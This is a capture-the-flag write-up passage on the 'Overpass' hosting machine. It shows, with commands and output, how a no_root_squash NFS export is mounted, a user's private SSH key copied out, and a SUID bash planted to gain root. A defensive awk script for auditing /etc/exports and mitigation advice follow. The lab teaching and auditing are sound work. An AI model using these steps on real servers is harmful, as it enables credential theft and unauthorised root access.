Overpass HOSTING

Exploitation

  • Mounting the NFS Share
[attacker@machine ~]$ mkdir /mnt/NFS
[attacker@machine ~]$ mount -t nfs localhost:/ /mnt/NFS -o nolock
  • Copying the Private SSH Key
[attacker@machine NFS]$ cd /mnt/NFS
[attacker@machine NFS]$ ls -l
...
.ssh
...
[attacker@machine NFS]$ cp .ssh/id_rsa /home/virtualbox
  • Copying BASH Binary from our System to the NFS Share and Setting SUID Permissions on it.
[attacker@machine NFS]$ cp /bin/bash . && chown root:root bash && chmod 4777 bash
[attacker@machine NFS]$ ls -l
...
-rwsrwxrwx 1 virtualbox virtualbox 1190928 7 ott 23.58 bash
...

  • Using the Private SSH Key to log in as the User james and running the BASH Binary that we copied to the Target Machine with the SUID Bit set.
[james@ip-10-10-109-248 ~]$ id
uid=1000(james) gid=1000(james) groups=1000(james)
[james@ip-10-10-109-248 ~]$ ls -l
total 1192
-rwsrwxrwx 1 root root 1219248 Oct 7 11:37 bash
[james@ip-10-10-109-248 ~]$ ./bash -p
[james@ip-10-10-109-248 ~]$ id
uid=1000(james) gid=1000(james) euid=0(root) groups=1000(james)
[james@ip-10-10-109-248 ~]$ whoami
root
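
The steps above only work when the export lets a client's root user keep UID 0 (the no_root_squash option), so a root-owned SUID file written from the client stays root-owned on the server. As an added example (not part of the original writeup), a server-side check that flags such entries in an /etc/exports-format file; the function name audit_exports and the sample entries are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag NFS exports where a remote root user is not squashed.
# audit_exports FILE prints "RISK <path> <client> no_root_squash" per risky
# entry and returns 1 if any were found, 0 otherwise.
# Assumptions: one export per line (no backslash continuations); when both
# root_squash and no_root_squash appear, the later option wins.
audit_exports() {
    awk '
        /^[ \t]*(#|$)/ { next }               # skip comments and blank lines
        {
            defaults = ""
            for (i = 2; i <= NF; i++) {
                # "-opt,opt" sets default options for the clients that follow
                if ($i ~ /^-/) { defaults = substr($i, 2); continue }
                client = $i; opts = ""
                if (match($i, /\(.*\)/)) {
                    client = substr($i, 1, RSTART - 1)
                    opts = substr($i, RSTART + 1, RLENGTH - 2)
                }
                if (client == "") client = "ANY"   # "(opts)" alone means any host
                squash = 1                          # root_squash is the default
                n = split(defaults "," opts, o, ",")
                for (j = 1; j <= n; j++) {
                    if (o[j] == "no_root_squash") squash = 0
                    else if (o[j] == "root_squash") squash = 1
                }
                if (!squash) { print "RISK", $1, client, "no_root_squash"; bad = 1 }
            }
        }
        END { exit bad + 0 }
    ' "$1"
}

# Constructed sample entries (not taken from the machine in this writeup).
sample=$(mktemp)
cat > "$sample" <<'EOF'
/srv/backups  10.0.0.0/24(rw,sync,no_root_squash)
/srv/public   *(ro,root_squash)
/srv/home     -no_root_squash 192.0.2.10(rw) 192.0.2.11(rw,root_squash)
EOF
audit_exports "$sample" || echo "exports without root squashing found"
rm -f "$sample"
```

Run it against /etc/exports on the NFS server. Removing no_root_squash from a flagged entry and mounting the exported filesystem with nosuid on the server both stop a client-written SUID binary from running as root there.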